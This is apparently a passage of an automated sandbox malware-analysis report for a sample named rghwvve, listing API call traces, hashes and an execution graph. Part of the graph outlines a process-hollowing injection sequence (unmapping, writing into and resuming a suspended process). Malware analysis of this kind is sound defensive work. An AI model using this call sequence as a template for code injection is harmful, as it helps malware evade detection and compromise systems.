                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005EEDD7 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005EEE28
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, Offset: 005E8000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_5e8000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3cd5bd5864ef84ea352ea746d0d700af5cdc717c28de67275389377c2ee8f138
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6112D79A00208EFDB01DF99C985E99BFF5AF08750F058094F9889B362D771EA50DB80
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040197A Relevance: 1.3, APIs: 1, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2410106384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_rghwvve.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:4.7%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:3.2%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:1191
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                                                                                                  execution_graph 11279 23cc026 11280 23cc035 11279->11280 11283 23cc7c6 11280->11283 11285 23cc7e1 11283->11285 11284 23cc7ea CreateToolhelp32Snapshot 11284->11285 11286 23cc806 Module32First 11284->11286 11285->11284 11285->11286 11287 23cc03e 11286->11287 11288 23cc815 11286->11288 11290 23cc485 11288->11290 11291 23cc4b0 11290->11291 11292 23cc4f9 11291->11292 11293 23cc4c1 VirtualAlloc 11291->11293 11292->11292 11293->11292 11245 2590000 11248 2590630 11245->11248 11247 2590005 11249 259064c 11248->11249 11251 2591577 11249->11251 11254 25905b0 11251->11254 11257 25905dc 11254->11257 11255 259061e 11256 25905e2 GetFileAttributesA 11256->11257 11257->11255 11257->11256 11259 2590420 11257->11259 11260 25904f3 11259->11260 11261 25904fa 11260->11261 11262 25904ff CreateWindowExA 11260->11262 11261->11257 11262->11261 11263 2590540 PostMessageA 11262->11263 11264 259055f 11263->11264 11264->11261 11266 2590110 VirtualAlloc GetModuleFileNameA 11264->11266 11267 259017d CreateProcessA 11266->11267 11268 2590414 11266->11268 11267->11268 11270 259025f VirtualFree VirtualAlloc Wow64GetThreadContext 11267->11270 11268->11264 11270->11268 11271 25902a9 ReadProcessMemory 11270->11271 11272 25902e5 VirtualAllocEx NtWriteVirtualMemory 11271->11272 11273 25902d5 NtUnmapViewOfSection 11271->11273 11274 259033b 11272->11274 11273->11272 11275 259039d WriteProcessMemory Wow64SetThreadContext ResumeThread 11274->11275 11276 2590350 NtWriteVirtualMemory 11274->11276 11277 25903fb ExitProcess 11275->11277 11276->11274 11294 4014bf 11344 401de0 11294->11344 11296 4014cb GetStartupInfoW 11297 4014df HeapSetInformation 11296->11297 11299 4014ea 11296->11299 11297->11299 11345 40431b HeapCreate 11299->11345 11300 401538 11301 401543 11300->11301 11410 40144f 11300->11410 11418 4041a0 GetModuleHandleW 11301->11418 11304 401549 11305 401555 __RTC_Initialize 11304->11305 11306 40154d 11304->11306 11346 403b0c GetStartupInfoW 11305->11346 11307 40144f _fast_error_exit 66 API calls 11306->11307 11308 401554 11307->11308 11308->11305 11311 401566 11443 401dbe 11311->11443 11312 40156e GetCommandLineA 11359 403a75 GetEnvironmentStringsW 11312->11359 11318 401588 11319 401594 11318->11319 11320 40158c 11318->11320 11372 403735 11319->11372 11321 401dbe __amsg_exit 66 API calls 11320->11321 11323 401593 11321->11323 11323->11319 11324 401599 11325 4015a5 11324->11325 11326 40159d 11324->11326 11388 401b9d 11325->11388 11327 401dbe __amsg_exit 66 API calls 11326->11327 11329 4015a4 11327->11329 11329->11325 11330 4015ac 11331 4015b1 11330->11331 11332 4015b8 11330->11332 11334 401dbe __amsg_exit 66 API calls 11331->11334 11394 4036d6 11332->11394 11335 4015b7 11334->11335 11335->11332 11336 4015c3 11337 4015bd 11336->11337 11337->11336 11400 5cbf60 11337->11400 11344->11296 11345->11300 11467 401955 11346->11467 11348 403cd5 GetStdHandle 11351 403c9f 11348->11351 11349 401955 __calloc_crt 66 API calls 11353 403b2a 11349->11353 11350 403d39 SetHandleCount 11357 401562 11350->11357 11351->11348 11351->11350 11354 403ce7 GetFileType 11351->11354 11358 403d0d InitializeCriticalSectionAndSpinCount 11351->11358 11352 403c1f 11352->11351 11355 403c56 InitializeCriticalSectionAndSpinCount 11352->11355 11356 403c4b GetFileType 11352->11356 11353->11349 11353->11351 11353->11352 11353->11357 11354->11351 11355->11352 11355->11357 11356->11352 11356->11355 11357->11311 11357->11312 11358->11351 11358->11357 11361 403a91 WideCharToMultiByte 11359->11361 11365 40157e 11359->11365 11362 403ac6 11361->11362 11363 403afe FreeEnvironmentStringsW 11361->11363 11364 401910 __malloc_crt 66 API calls 11362->11364 11363->11365 11366 403acc 11364->11366 11450 4039ba 11365->11450 11366->11363 11367 403ad4 WideCharToMultiByte 11366->11367 11368 403af2 FreeEnvironmentStringsW 11367->11368 11369 403ae6 11367->11369 11368->11365 11370 405342 _free 66 API calls 11369->11370 11371 403aee 11370->11371 11371->11368 11373 40373e 11372->11373 11377 403743 _strlen 11372->11377 11693 405d7e 11373->11693 11375 403751 11375->11324 11376 401955 __calloc_crt 66 API calls 11382 403778 _strlen 11376->11382 11377->11375 11377->11376 11378 4037c7 11379 405342 _free 66 API calls 11378->11379 11379->11375 11380 401955 __calloc_crt 66 API calls 11380->11382 11381 4037ed 11383 405342 _free 66 API calls 11381->11383 11382->11375 11382->11378 11382->11380 11382->11381 11385 403804 11382->11385 11697 408de1 11382->11697 11383->11375 11386 4030e2 __invoke_watson 10 API calls 11385->11386 11387 403810 11386->11387 11387->11324 11389 401bab __IsNonwritableInCurrentImage 11388->11389 12146 40506f 11389->12146 11391 401bc9 __initterm_e 11393 401bea __IsNonwritableInCurrentImage 11391->11393 12149 401286 11391->12149 11393->11330 11395 4036e4 11394->11395 11398 4036e9 11394->11398 11396 405d7e ___initmbctable 94 API calls 11395->11396 11396->11398 11397 403725 11397->11337 11398->11397 12214 408d30 11398->12214 11402 5cbf6a __write_nolock 11400->11402 11401 5cbf9d GetSystemTimes 11401->11402 11402->11401 11403 5cbfad 11402->11403 11404 5cbfc7 FlushFileBuffers GetVolumeInformationW 11403->11404 11405 5cc032 11403->11405 11404->11403 12220 5cbb00 11405->12220 11411 401462 11410->11411 11412 40145d 11410->11412 11414 40335e __NMSG_WRITE 66 API calls 11411->11414 11413 40350d __FF_MSGBANNER 66 API calls 11412->11413 11413->11411 11415 40146a 11414->11415 11416 401a9f __heap_alloc 3 API calls 11415->11416 11417 401474 11416->11417 11417->11301 11419 4041b4 11418->11419 11420 4041bd GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11418->11420 12586 403e73 11419->12586 11422 404207 TlsAlloc 11420->11422 11425 404255 TlsSetValue 11422->11425 11426 404316 11422->11426 11425->11426 11427 404266 11425->11427 11426->11304 12596 401ac9 11427->12596 11432 404311 11434 403e73 __mtterm 70 API calls 11432->11434 11433 4042ae DecodePointer 11435 4042c3 11433->11435 11434->11426 11435->11432 11436 401955 __calloc_crt 66 API calls 11435->11436 11437 4042d9 11436->11437 11437->11432 11438 4042e1 DecodePointer 11437->11438 11439 4042f2 11438->11439 11439->11432 11440 4042f6 11439->11440 11441 403eb0 __getptd_noexit 66 API calls 11440->11441 11442 4042fe GetCurrentThreadId 11441->11442 11442->11426 11444 40350d __FF_MSGBANNER 66 API calls 11443->11444 11445 401dc8 11444->11445 11446 40335e __NMSG_WRITE 66 API calls 11445->11446 11447 401dd0 11446->11447 12607 401d8a 11447->12607 11451 4039d4 GetModuleFileNameA 11450->11451 11452 4039cf 11450->11452 11454 4039fb 11451->11454 11453 405d7e ___initmbctable 94 API calls 11452->11453 11453->11451 12640 403820 11454->12640 11456 403a57 11456->11318 11458 401910 __malloc_crt 66 API calls 11459 403a3d 11458->11459 11459->11456 11460 403820 _parse_cmdline 76 API calls 11459->11460 11460->11456 11471 40195e 11467->11471 11469 40199b 11469->11353 11470 40197c Sleep 11470->11471 11471->11469 11471->11470 11472 401853 11471->11472 11473 40185f 11472->11473 11478 40187a 11472->11478 11474 40186b 11473->11474 11473->11478 11481 40177e 11474->11481 11475 40188d HeapAlloc 11477 4018b4 11475->11477 11475->11478 11477->11471 11478->11475 11478->11477 11484 404452 DecodePointer 11478->11484 11486 403f64 GetLastError 11481->11486 11483 401783 11483->11471 11485 404467 11484->11485 11485->11478 11500 403e22 TlsGetValue 11486->11500 11488 403fd1 SetLastError 11488->11483 11490 401955 __calloc_crt 62 API calls 11491 403f8f 11490->11491 11491->11488 11492 403f97 DecodePointer 11491->11492 11493 403fac 11492->11493 11494 403fb0 11493->11494 11495 403fc8 11493->11495 11503 403eb0 11494->11503 11516 405342 11495->11516 11498 403fce 11498->11488 11499 403fb8 GetCurrentThreadId 11499->11488 11501 403e52 11500->11501 11502 403e37 DecodePointer TlsSetValue 11500->11502 11501->11488 11501->11490 11502->11501 11522 401de0 11503->11522 11505 403ebc GetModuleHandleW 11523 4047fa 11505->11523 11507 403efa InterlockedIncrement 11530 403f52 11507->11530 11510 4047fa __lock 64 API calls 11511 403f1b 11510->11511 11533 405d9c InterlockedIncrement 11511->11533 11513 403f39 11545 403f5b 11513->11545 11515 403f46 _raise 11515->11499 11517 405376 _rand_s 11516->11517 11518 40534d HeapFree 11516->11518 11517->11498 11518->11517 11519 405362 11518->11519 11520 40177e __configthreadlocale 64 API calls 11519->11520 11521 405368 GetLastError 11520->11521 11521->11517 11522->11505 11524 404822 EnterCriticalSection 11523->11524 11525 40480f 11523->11525 11524->11507 11548 404738 11525->11548 11527 404815 11527->11524 11528 401dbe __amsg_exit 65 API calls 11527->11528 11529 404821 11528->11529 11529->11524 11691 404709 LeaveCriticalSection 11530->11691 11532 403f14 11532->11510 11534 405dba InterlockedIncrement 11533->11534 11535 405dbd 11533->11535 11534->11535 11536 405dc7 InterlockedIncrement 11535->11536 11537 405dca 11535->11537 11536->11537 11538 405dd4 InterlockedIncrement 11537->11538 11539 405dd7 11537->11539 11538->11539 11540 405de1 InterlockedIncrement 11539->11540 11541 405de4 11539->11541 11540->11541 11542 405dfd InterlockedIncrement 11541->11542 11543 405e0d InterlockedIncrement 11541->11543 11544 405e18 InterlockedIncrement 11541->11544 11542->11541 11543->11541 11544->11513 11692 404709 LeaveCriticalSection 11545->11692 11547 403f62 11547->11515 11549 404744 _raise 11548->11549 11550 40476a 11549->11550 11573 40350d 11549->11573 11559 40477a _raise 11550->11559 11609 401910 11550->11609 11557 40479b 11562 4047fa __lock 65 API calls 11557->11562 11558 40478c 11561 40177e __configthreadlocale 65 API calls 11558->11561 11559->11527 11561->11559 11563 4047a2 11562->11563 11564 4047d5 11563->11564 11565 4047aa InitializeCriticalSectionAndSpinCount 11563->11565 11567 405342 _free 65 API calls 11564->11567 11566 4047ba 11565->11566 11572 4047c6 11565->11572 11568 405342 _free 65 API calls 11566->11568 11567->11572 11569 4047c0 11568->11569 11571 40177e __configthreadlocale 65 API calls 11569->11571 11571->11572 11614 4047f1 11572->11614 11617 408ad6 11573->11617 11575 403514 11576 408ad6 __FF_MSGBANNER 66 API calls 11575->11576 11580 403521 11575->11580 11576->11580 11577 40335e __NMSG_WRITE 66 API calls 11578 403539 11577->11578 11581 40335e __NMSG_WRITE 66 API calls 11578->11581 11579 403543 11582 40335e 11579->11582 11580->11577 11580->11579 11581->11579 11583 40337f __NMSG_WRITE 11582->11583 11585 408ad6 __FF_MSGBANNER 63 API calls 11583->11585 11605 40349b 11583->11605 11587 403399 11585->11587 11586 40350b 11606 401a9f 11586->11606 11588 4034aa GetStdHandle 11587->11588 11589 408ad6 __FF_MSGBANNER 63 API calls 11587->11589 11592 4034b8 _strlen 11588->11592 11588->11605 11590 4033aa 11589->11590 11590->11588 11591 4033bc 11590->11591 11591->11605 11624 408a73 11591->11624 11595 4034ee WriteFile 11592->11595 11592->11605 11595->11605 11596 4033e8 GetModuleFileNameW 11597 403409 11596->11597 11600 403415 _wcslen 11596->11600 11598 408a73 __NMSG_WRITE 63 API calls 11597->11598 11598->11600 11601 408916 63 API calls __NMSG_WRITE 11600->11601 11603 40348b 11600->11603 11633 4030e2 11600->11633 11636 40898b 11600->11636 11601->11600 11645 4087aa 11603->11645 11663 401114 11605->11663 11671 401a74 GetModuleHandleW 11606->11671 11611 401919 11609->11611 11612 40194f 11611->11612 11613 401930 Sleep 11611->11613 11674 4044b9 11611->11674 11612->11557 11612->11558 11613->11611 11690 404709 LeaveCriticalSection 11614->11690 11616 4047f8 11616->11559 11618 408ae2 11617->11618 11619 40177e __configthreadlocale 66 API calls 11618->11619 11620 408aec 11618->11620 11621 408b05 11619->11621 11620->11575 11622 40314e __configthreadlocale 11 API calls 11621->11622 11623 408b10 11622->11623 11623->11575 11625 408a81 11624->11625 11626 408a88 11624->11626 11625->11626 11630 408aa9 11625->11630 11627 40177e __configthreadlocale 66 API calls 11626->11627 11628 408a8d 11627->11628 11629 40314e __configthreadlocale 11 API calls 11628->11629 11631 4033dd 11629->11631 11630->11631 11632 40177e __configthreadlocale 66 API calls 11630->11632 11631->11596 11631->11600 11632->11628 11634 402f85 __call_reportfault 8 API calls 11633->11634 11635 4030f4 GetCurrentProcess TerminateProcess 11634->11635 11635->11600 11641 40899d 11636->11641 11637 4089a1 11638 4089a6 11637->11638 11639 40177e __configthreadlocale 66 API calls 11637->11639 11638->11600 11640 4089bd 11639->11640 11642 40314e __configthreadlocale 11 API calls 11640->11642 11641->11637 11641->11638 11643 4089e4 11641->11643 11642->11638 11643->11638 11644 40177e __configthreadlocale 66 API calls 11643->11644 11644->11640 11646 403df0 _raise EncodePointer 11645->11646 11647 4087d0 11646->11647 11648 4087e0 LoadLibraryW 11647->11648 11649 40885d 11647->11649 11650 4088f5 11648->11650 11651 4087f5 GetProcAddress 11648->11651 11652 408877 DecodePointer DecodePointer 11649->11652 11660 40888a 11649->11660 11656 401114 setSBUpLow 5 API calls 11650->11656 11651->11650 11655 40880b 7 API calls 11651->11655 11652->11660 11653 4088c0 DecodePointer 11654 4088e9 DecodePointer 11653->11654 11657 4088c7 11653->11657 11654->11650 11655->11649 11658 40884d GetProcAddress EncodePointer 11655->11658 11659 408914 11656->11659 11657->11654 11661 4088da DecodePointer 11657->11661 11658->11649 11659->11605 11660->11653 11660->11654 11662 4088ad 11660->11662 11661->11654 11661->11662 11662->11654 11664 40111c 11663->11664 11665 40111e IsDebuggerPresent 11663->11665 11664->11586 11667 4043ee __call_reportfault 11665->11667 11668 401703 SetUnhandledExceptionFilter UnhandledExceptionFilter 11667->11668 11669 401728 GetCurrentProcess TerminateProcess 11668->11669 11670 401720 __call_reportfault 11668->11670 11669->11586 11670->11669 11672 401a88 GetProcAddress 11671->11672 11673 401a98 ExitProcess 11671->11673 11672->11673 11675 404536 11674->11675 11679 4044c7 11674->11679 11676 404452 _malloc DecodePointer 11675->11676 11677 40453c 11676->11677 11680 40177e __configthreadlocale 65 API calls 11677->11680 11678 40350d __FF_MSGBANNER 65 API calls 11678->11679 11679->11678 11681 4044f5 HeapAlloc 11679->11681 11683 40335e __NMSG_WRITE 65 API calls 11679->11683 11684 404522 11679->11684 11686 401a9f __heap_alloc GetModuleHandleW GetProcAddress ExitProcess 11679->11686 11687 404452 _malloc DecodePointer 11679->11687 11688 404520 11679->11688 11682 40452e 11680->11682 11681->11679 11681->11682 11682->11611 11683->11679 11685 40177e __configthreadlocale 65 API calls 11684->11685 11685->11688 11686->11679 11687->11679 11689 40177e __configthreadlocale 65 API calls 11688->11689 11689->11682 11690->11616 11691->11532 11692->11547 11694 405d87 11693->11694 11696 405d8e 11693->11696 11706 405be4 11694->11706 11696->11377 11698 408df6 11697->11698 11699 408def 11697->11699 11700 40177e __configthreadlocale 66 API calls 11698->11700 11699->11698 11703 408e14 11699->11703 11701 408dfb 11700->11701 12137 40314e 11701->12137 11704 408e05 11703->11704 11705 40177e __configthreadlocale 66 API calls 11703->11705 11704->11382 11705->11701 11707 405bf0 _raise 11706->11707 11737 403fdd 11707->11737 11711 405c03 11758 405941 11711->11758 11714 401910 __malloc_crt 66 API calls 11715 405c24 11714->11715 11716 405d43 _raise 11715->11716 11765 4059bd 11715->11765 11716->11696 11719 405d50 11719->11716 11723 405d63 11719->11723 11725 405342 _free 66 API calls 11719->11725 11720 405c54 InterlockedDecrement 11721 405c64 11720->11721 11722 405c75 InterlockedIncrement 11720->11722 11721->11722 11727 405342 _free 66 API calls 11721->11727 11722->11716 11724 405c8b 11722->11724 11726 40177e __configthreadlocale 66 API calls 11723->11726 11724->11716 11728 4047fa __lock 66 API calls 11724->11728 11725->11723 11726->11716 11729 405c74 11727->11729 11731 405c9f InterlockedDecrement 11728->11731 11729->11722 11732 405d1b 11731->11732 11733 405d2e InterlockedIncrement 11731->11733 11732->11733 11735 405342 _free 66 API calls 11732->11735 11775 405d45 11733->11775 11736 405d2d 11735->11736 11736->11733 11738 403f64 __getptd_noexit 66 API calls 11737->11738 11739 403fe5 11738->11739 11740 403ff2 11739->11740 11741 401dbe __amsg_exit 66 API calls 11739->11741 11742 40589d 11740->11742 11741->11740 11743 4058a9 _raise 11742->11743 11744 403fdd __getptd 66 API calls 11743->11744 11745 4058ae 11744->11745 11746 4058c0 11745->11746 11747 4047fa __lock 66 API calls 11745->11747 11750 401dbe __amsg_exit 66 API calls 11746->11750 11754 4058ce _raise 11746->11754 11748 4058de 11747->11748 11749 405927 11748->11749 11752 4058f5 InterlockedDecrement 11748->11752 11753 40590f InterlockedIncrement 11748->11753 11778 405938 11749->11778 11750->11754 11752->11753 11755 405900 11752->11755 11753->11749 11754->11711 11755->11753 11756 405342 _free 66 API calls 11755->11756 11757 40590e 11756->11757 11757->11753 11782 402284 11758->11782 11761 405960 GetOEMCP 11764 405970 11761->11764 11762 40597e 11763 405983 GetACP 11762->11763 11762->11764 11763->11764 11764->11714 11764->11716 11766 405941 getSystemCP 78 API calls 11765->11766 11768 4059dd 11766->11768 11767 4059e8 setSBCS 11769 401114 setSBUpLow 5 API calls 11767->11769 11768->11767 11771 405a2c IsValidCodePage 11768->11771 11774 405a51 _memset __setmbcp_nolock 11768->11774 11770 405ba4 11769->11770 11770->11719 11770->11720 11771->11767 11772 405a3e GetCPInfo 11771->11772 11772->11767 11772->11774 12075 40570d GetCPInfo 11774->12075 12136 404709 LeaveCriticalSection 11775->12136 11777 405d4c 11777->11716 11781 404709 LeaveCriticalSection 11778->11781 11780 40593f 11780->11746 11781->11780 11783 402297 11782->11783 11789 4022e4 11782->11789 11784 403fdd __getptd 66 API calls 11783->11784 11785 40229c 11784->11785 11786 4022c4 11785->11786 11790 40605c 11785->11790 11788 40589d __setmbcp 68 API calls 11786->11788 11786->11789 11788->11789 11789->11761 11789->11762 11791 406068 _raise 11790->11791 11792 403fdd __getptd 66 API calls 11791->11792 11793 40606d 11792->11793 11794 40609b 11793->11794 11795 40607f 11793->11795 11796 4047fa __lock 66 API calls 11794->11796 11797 403fdd __getptd 66 API calls 11795->11797 11798 4060a2 11796->11798 11799 406084 11797->11799 11805 40600f 11798->11805 11803 406092 _raise 11799->11803 11804 401dbe __amsg_exit 66 API calls 11799->11804 11803->11786 11804->11803 11806 406051 11805->11806 11807 40601c 11805->11807 11813 4060c9 11806->11813 11807->11806 11808 405d9c ___addlocaleref 8 API calls 11807->11808 11809 406032 11808->11809 11809->11806 11816 405e2b 11809->11816 12074 404709 LeaveCriticalSection 11813->12074 11815 4060d0 11815->11799 11817 405e3c InterlockedDecrement 11816->11817 11818 405ebf 11816->11818 11819 405e51 InterlockedDecrement 11817->11819 11820 405e54 11817->11820 11818->11806 11830 405ec4 11818->11830 11819->11820 11821 405e61 11820->11821 11822 405e5e InterlockedDecrement 11820->11822 11823 405e6b InterlockedDecrement 11821->11823 11824 405e6e 11821->11824 11822->11821 11823->11824 11825 405e78 InterlockedDecrement 11824->11825 11827 405e7b 11824->11827 11825->11827 11826 405e94 InterlockedDecrement 11826->11827 11827->11826 11828 405ea4 InterlockedDecrement 11827->11828 11829 405eaf InterlockedDecrement 11827->11829 11828->11827 11829->11818 11831 405f48 11830->11831 11834 405edb 11830->11834 11832 405f95 11831->11832 11833 405342 _free 66 API calls 11831->11833 11850 405fbe 11832->11850 11900 40aa43 11832->11900 11835 405f69 11833->11835 11834->11831 11837 405f0f 11834->11837 11845 405342 _free 66 API calls 11834->11845 11838 405342 _free 66 API calls 11835->11838 11839 405f30 11837->11839 11849 405342 _free 66 API calls 11837->11849 11841 405f7c 11838->11841 11842 405342 _free 66 API calls 11839->11842 11848 405342 _free 66 API calls 11841->11848 11851 405f3d 11842->11851 11843 406003 11846 405342 _free 66 API calls 11843->11846 11844 405342 _free 66 API calls 11844->11850 11847 405f04 11845->11847 11852 406009 11846->11852 11860 40b0c0 11847->11860 11854 405f8a 11848->11854 11855 405f25 11849->11855 11850->11843 11856 405342 66 API calls _free 11850->11856 11857 405342 _free 66 API calls 11851->11857 11852->11806 11858 405342 _free 66 API calls 11854->11858 11888 40ae67 11855->11888 11856->11850 11857->11831 11858->11832 11861 40b0d1 11860->11861 11887 40b1ba 11860->11887 11862 40b0e2 11861->11862 11863 405342 _free 66 API calls 11861->11863 11864 405342 _free 66 API calls 11862->11864 11867 40b0f4 11862->11867 11863->11862 11864->11867 11865 40b106 11866 40b118 11865->11866 11869 405342 _free 66 API calls 11865->11869 11870 40b12a 11866->11870 11871 405342 _free 66 API calls 11866->11871 11867->11865 11868 405342 _free 66 API calls 11867->11868 11868->11865 11869->11866 11872 40b13c 11870->11872 11873 405342 _free 66 API calls 11870->11873 11871->11870 11874 40b14e 11872->11874 11876 405342 _free 66 API calls 11872->11876 11873->11872 11875 40b160 11874->11875 11877 405342 _free 66 API calls 11874->11877 11878 40b172 11875->11878 11879 405342 _free 66 API calls 11875->11879 11876->11874 11877->11875 11880 40b184 11878->11880 11881 405342 _free 66 API calls 11878->11881 11879->11878 11882 40b196 11880->11882 11884 405342 _free 66 API calls 11880->11884 11881->11880 11883 40b1a8 11882->11883 11885 405342 _free 66 API calls 11882->11885 11886 405342 _free 66 API calls 11883->11886 11883->11887 11884->11882 11885->11883 11886->11887 11887->11837 11889 40ae74 11888->11889 11899 40aecc 11888->11899 11890 405342 _free 66 API calls 